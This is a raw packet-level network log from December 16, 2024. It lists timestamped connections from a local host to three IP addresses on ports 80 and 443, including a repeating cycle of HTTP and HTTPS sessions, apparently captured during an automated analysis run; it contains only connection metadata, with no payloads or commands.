Dec 16, 2024 18:28:50.080768108 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.080805063 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.080885887 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.083311081 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.083429098 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.083578110 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.083637953 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.090799093 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.090888977 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.090943098 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.091005087 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.091890097 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.091967106 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.092027903 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.092082977 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.099280119 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.099380970 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.099409103 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.099479914 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.100523949 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.100610018 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.100677013 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.100749016 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.100764036 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.100836039 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.107460976 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.107569933 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.107599020 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.107647896 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.109128952 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.109193087 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.109215021 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.109267950 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.115792036 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.115880013 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.115931988 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.115993023 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.117471933 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.117605925 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.117624998 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.117686033 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.123950005 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.124007940 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.124109030 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.124166012 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.125777960 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.125830889 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.125910044 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.125956059 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.130378962 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.130466938 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.130486965 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.130599022 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.133626938 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.133706093 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.134038925 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.134111881 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.137676001 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.137732983 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.137878895 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.137932062 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.141345024 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.141427040 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.141464949 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.141519070 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.145679951 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.145772934 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.145849943 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.145931005 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.149233103 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.149296999 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.149584055 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.149636030 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.152820110 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.152896881 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.153002024 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.153060913 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.156208992 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.156261921 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.156411886 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.156465054 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.160003901 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.160084963 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.160267115 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.160321951 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.163564920 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.163707018 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.163779974 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.163836956 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.166680098 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.166744947 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.167052984 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.167112112 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.170002937 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.170068979 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.170156956 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.170303106 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.173156977 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.173222065 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.173275948 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.173335075 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.177139044 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.177261114 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.177275896 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.177331924 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.179487944 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.179559946 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.179660082 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.179721117 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.182508945 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.182586908 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.182600975 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.182652950 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.185471058 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.185544014 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.185612917 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.185674906 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.189692974 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.189788103 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.189800024 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.189862013 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.190324068 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.190388918 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.191545963 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.191723108 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.192075014 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.192141056 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.195195913 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.195261955 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.195609093 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.195674896 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.197700977 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.197760105 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.198141098 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.198200941 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.202861071 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.202927113 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.203190088 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.203248024 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.207868099 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.207932949 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.208374977 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.208437920 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.208451986 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.208517075 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.209553003 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.209614992 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.219345093 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.219407082 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.219419003 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.219480991 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.219546080 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.219604015 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.219665051 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.219670057 CET | 443 | 49737 | 142.250.181.1 | 192.168.2.4 |
Dec 16, 2024 18:28:50.219743013 CET | 49737 | 443 | 192.168.2.4 | 142.250.181.1 |
Dec 16, 2024 18:28:50.599853992 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:50.720109940 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:50.720330954 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:50.720628977 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:50.840420008 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:51.925323009 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:51.928620100 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:52.048567057 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:52.303622007 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:52.347534895 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:53.165775061 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:53.165838957 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:53.165929079 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:53.168272018 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:53.168298006 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.402704000 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.403069019 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:54.407959938 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:54.407979965 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.408447981 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.413764954 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:54.459342957 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.849054098 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.849205017 CET | 443 | 49739 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:54.849272966 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:54.855114937 CET | 49739 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:54.864197969 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:54.984307051 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:55.238343954 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:55.241776943 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:55.241872072 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:55.241969109 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:55.242360115 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:55.242403030 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:55.285176039 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:56.469893932 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:56.471791983 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:56.471865892 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:56.968864918 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:56.969032049 CET | 443 | 49740 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:56.969125032 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:56.969435930 CET | 49740 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:56.972270966 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:56.973438025 CET | 49742 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:57.092730045 CET | 80 | 49738 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:57.093020916 CET | 49738 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:57.093424082 CET | 80 | 49742 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:57.093600035 CET | 49742 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:57.093662024 CET | 49742 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:57.213758945 CET | 80 | 49742 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:58.322419882 CET | 80 | 49742 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:28:58.324235916 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:58.324338913 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:58.324477911 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:58.324902058 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:58.324933052 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:58.363209963 CET | 49742 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:28:59.596664906 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:28:59.598958969 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:28:59.599042892 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:00.049329996 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:00.049408913 CET | 443 | 49744 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:00.049604893 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:00.050142050 CET | 49744 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:00.056137085 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:00.176249981 CET | 80 | 49750 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:00.176476002 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:00.176654100 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:00.296853065 CET | 80 | 49750 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:02.105992079 CET | 80 | 49750 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:02.107377052 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:02.107419014 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:02.107511997 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:02.107760906 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:02.107774019 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:02.160053968 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:03.335783958 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:03.338340998 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:03.338428974 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:03.812136889 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:03.812220097 CET | 443 | 49756 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:03.812339067 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:03.812762976 CET | 49756 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:03.815728903 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:03.816705942 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:03.936707020 CET | 80 | 49750 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:03.936798096 CET | 80 | 49761 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:03.937122107 CET | 49750 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:03.937235117 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:03.937235117 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:04.057531118 CET | 80 | 49761 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:05.424324989 CET | 80 | 49761 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:05.425813913 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:05.425868988 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:05.425985098 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:05.426209927 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:05.426230907 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:05.472553968 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:06.640319109 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:06.642132044 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:06.642229080 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:07.096913099 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:07.096990108 CET | 443 | 49765 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:07.097084045 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:07.097724915 CET | 49765 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:07.106282949 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:07.107414961 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:07.227170944 CET | 80 | 49761 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:07.227386951 CET | 49761 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:07.227777004 CET | 80 | 49768 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:07.227885962 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:07.228050947 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:07.347791910 CET | 80 | 49768 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:08.436230898 CET | 80 | 49768 | 158.101.44.242 | 192.168.2.4 |
Dec 16, 2024 18:29:08.437510967 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:08.437597990 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:08.437845945 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:08.437956095 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:08.437990904 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:08.488262892 CET | 49768 | 80 | 192.168.2.4 | 158.101.44.242 |
Dec 16, 2024 18:29:09.685869932 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:09.687465906 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:09.687501907 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:10.139029980 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:10.139122963 CET | 443 | 49774 | 104.21.67.152 | 192.168.2.4 |
Dec 16, 2024 18:29:10.139424086 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
Dec 16, 2024 18:29:10.140122890 CET | 49774 | 443 | 192.168.2.4 | 104.21.67.152 |
